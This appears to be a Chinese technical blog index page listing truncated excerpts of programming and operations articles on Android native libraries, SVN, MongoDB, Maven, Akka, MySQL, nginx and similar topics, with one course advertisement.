    下面是一些个人架构上的总结,本来想只在公司内部进行共享的,因此内容写的口语化一点,也没什么图示,所有内容没有查任何资料是脑子里面的东西吐出来的因此可能会不准确不全,希望抛砖引玉,大家互相讨论。 要注意,我这些文章是一个总体的架构经验不针对具体的语言和平台,因此也不一定是适用所有的语言和平台的。 (内容是前几天写的,现附上索引)   前端架构 http://www.
  • Android so lib库远程http下载和动态注册 aijuans andorid
    一、背景      在开发Android应用程序的实现,有时候需要引入第三方so lib库,但第三方so库比较大,例如开源第三方播放组件ffmpeg库, 如果直接打包的apk包里面, 整个应用程序会大很多.经过查阅资料和实验,发现通过远程下载so文件,然后再动态注册so文件时可行的。主要需要解决下载so文件存放位置以及文件读写权限问题。   二、主要
  • linux中svn配置出错 conf/svnserve.conf:12: Option expected 解决方法 baalwolf option
    在客户端访问subversion版本库时出现这个错误: svnserve.conf:12: Option expected 为什么会出现这个错误呢,就是因为subversion读取配置文件svnserve.conf时,无法识别有前置空格的配置文件,如### This file controls the configuration of the svnserve daemon, if you##
  • MongoDB的连接池和连接管理 BigCat2013 mongodb
    在关系型数据库中,我们总是需要关闭使用的数据库连接,不然大量的创建连接会导致资源的浪费甚至于数据库宕机。这篇文章主要想解释一下mongoDB的连接池以及连接管理机制,如果正对此有疑惑的朋友可以看一下。 通常我们习惯于new 一个connection并且通常在finally语句中调用connection的close()方法将其关闭。正巧,mongoDB中当我们new一个Mongo的时候,会发现它也
  • AngularJS使用Socket.IO bijian1013 JavaScriptAngularJSSocket.IO
            目前,web应用普遍被要求是实时web应用,即服务端的数据更新之后,应用能立即更新。以前使用的技术(例如polling)存在一些局限性,而且有时我们需要在客户端打开一个socket,然后进行通信。         Socket.IO(http://socket.io/)是一个非常优秀的库,它可以帮你实
  • [Maven学习笔记四]Maven依赖特性 bit1129 maven
    三个模块 为了说明问题,以用户登陆小web应用为例。通常一个web应用分为三个模块,模型和数据持久化层user-core, 业务逻辑层user-service以及web展现层user-web, user-service依赖于user-core user-web依赖于user-core和user-service   依赖作用范围  Maven的dependency定义
  • 【Akka一】Akka入门 bit1129 akka
    什么是Akka Message-Driven Runtime is the Foundation to Reactive Applications In Akka, your business logic is driven through message-based communication patterns that are independent of physical locatio
  • zabbix_api之perl语言写法 ronin47 zabbix_api之perl
    zabbix_api网上比较多的写法是python或curl。上次我用java--http://bossr.iteye.com/blog/2195679,这次用perl。for example: #!/usr/bin/perl use 5.010 ; use strict ; use warnings ; use JSON :: RPC :: Client ; use
  • 比优衣库跟牛掰的视频流出了,兄弟连Linux运维工程师课堂实录,更加刺激,更加实在! brotherlamp linux运维工程师linux运维工程师教程linux运维工程师视频linux运维工程师资料linux运维工程师自学
    比优衣库跟牛掰的视频流出了,兄弟连Linux运维工程师课堂实录,更加刺激,更加实在!   ----------------------------------------------------- 兄弟连Linux运维工程师课堂实录-计算机基础-1-课程体系介绍1 链接:http://pan.baidu.com/s/1i3GQtGL 密码:bl65   兄弟连Lin
  • bitmap求哈密顿距离-给定N(1<=N<=100000)个五维的点A(x1,x2,x3,x4,x5),求两个点X(x1,x2,x3,x4,x5)和Y( bylijinnan java
    import java.util.Random; /** * 题目: * 给定N(1<=N<=100000)个五维的点A(x1,x2,x3,x4,x5),求两个点X(x1,x2,x3,x4,x5)和Y(y1,y2,y3,y4,y5), * 使得他们的哈密顿距离(d=|x1-y1| + |x2-y2| + |x3-y3| + |x4-y4| + |x5-y5|)最大
  • map的三种遍历方法 chicony map
    package com.test; import java.util.Collection; import java.util.HashMap; import java.util.Iterator; import java.util.Map; import java.util.Set; public class TestMap { public static v
  • Linux安装mysql的一些坑 chenchao051 linux
    1、mysql不建议在root用户下运行   2、出现服务启动不了,111错误,注意要用chown来赋予权限, 我在root用户下装的mysql,我就把usr/share/mysql/mysql.server复制到/etc/init.d/mysqld, (同时把my-huge.cnf复制/etc/my.cnf)  chown -R cc /etc/init.d/mysql
  • Sublime Text 3 配置 daizj 配置Sublime Text
    Sublime Text 3 配置解释(默认){// 设置主题文件“color_scheme”: “Packages/Color Scheme – Default/Monokai.tmTheme”,// 设置字体和大小“font_face”: “Consolas”,“font_size”: 12,// 字体选项:no_bold不显示粗体字,no_italic不显示斜体字,no_antialias和
  • MySQL server has gone away 问题的解决方法 dcj3sjt126com SQL Server
    MySQL server has gone away 问题解决方法,需要的朋友可以参考下。 应用程序(比如PHP)长时间的执行批量的MYSQL语句。执行一个SQL,但SQL语句过大或者语句中含有BLOB或者longblob字段。比如,图片数据的处理。都容易引起MySQL server has gone away。 今天遇到类似的情景,MySQL只是冷冷的说:MySQL server h
  • javascript/dom:固定居中效果 dcj3sjt126com JavaScript
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml&
  • 使用 Spring 2.5 注释驱动的 IoC 功能 e200702084 springbean配置管理IOCOffice
    使用 Spring 2.5 注释驱动的 IoC 功能 developerWorks 文档选项 将打印机的版面设置成横向打印模式 打印本页 将此页作为电子邮件发送 将此页作为电子邮件发送 级别: 初级 陈 雄华 ([email protected]), 技术总监, 宝宝淘网络科技有限公司 2008 年 2 月 28 日  &nb
  • MongoDB常用操作命令 geeksun mongodb
    1.   基本操作 db.AddUser(username,password)               添加用户 db.auth(usrename,password)      设置数据库连接验证 db.cloneDataBase(fromhost)    
  • php写守护进程(Daemon) hongtoushizi PHP
    转载自: http://blog.csdn.net/tengzhaorong/article/details/9764655   守护进程(Daemon)是运行在后台的一种特殊进程。它独立于控制终端并且周期性地执行某种任务或等待处理某些发生的事件。守护进程是一种很有用的进程。php也可以实现守护进程的功能。   1、基本概念   &nbs
  • spring整合mybatis,关于注入Dao对象出错问题 jonsvien DAOspringbeanmybatisprototype
    今天在公司测试功能时发现一问题: 先进行代码说明: 1,controller配置了Scope="prototype"(表明每一次请求都是原子型)    @resource/@autowired service对象都可以(两种注解都可以)。 2,service 配置了Scope="prototype"(表明每一次请求都是原子型)
  • 对象关系行为模式之标识映射 home198979 PHP架构企业应用对象关系标识映射
    HELLO!架构   一、概念 identity Map:通过在映射中保存每个已经加载的对象,确保每个对象只加载一次,当要访问对象的时候,通过映射来查找它们。其实在数据源架构模式之数据映射器代码中有提及到标识映射,Mapper类的getFromMap方法就是实现标识映射的实现。     二、为什么要使用标识映射? 在数据源架构模式之数据映射器中 //c
  • Linux下hosts文件详解 pda158 linux
     1、主机名:   无论在局域网还是INTERNET上,每台主机都有一个IP地址,是为了区分此台主机和彼台主机,也就是说IP地址就是主机的门牌号。   公网:IP地址不方便记忆,所以又有了域名。域名只是在公网(INtERNET)中存在,每个域名都对应一个IP地址,但一个IP地址可有对应多个域名。   局域网:每台机器都有一个主机名,用于主机与主机之间的便于区分,就可以为每台机器设置主机
  • nginx配置文件粗解 spjich javanginx
    #运行用户#user  nobody;#启动进程,通常设置成和cpu的数量相等worker_processes  2;#全局错误日志及PID文件#error_log  logs/error.log;#error_log  logs/error.log  notice;#error_log  logs/error.log  inf
  • 数学函数 w54653520 java
    public  class  S {        // 传入两个整数,进行比较,返回两个数中的最大值的方法。      public  int  get( int  num1, int  nu
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他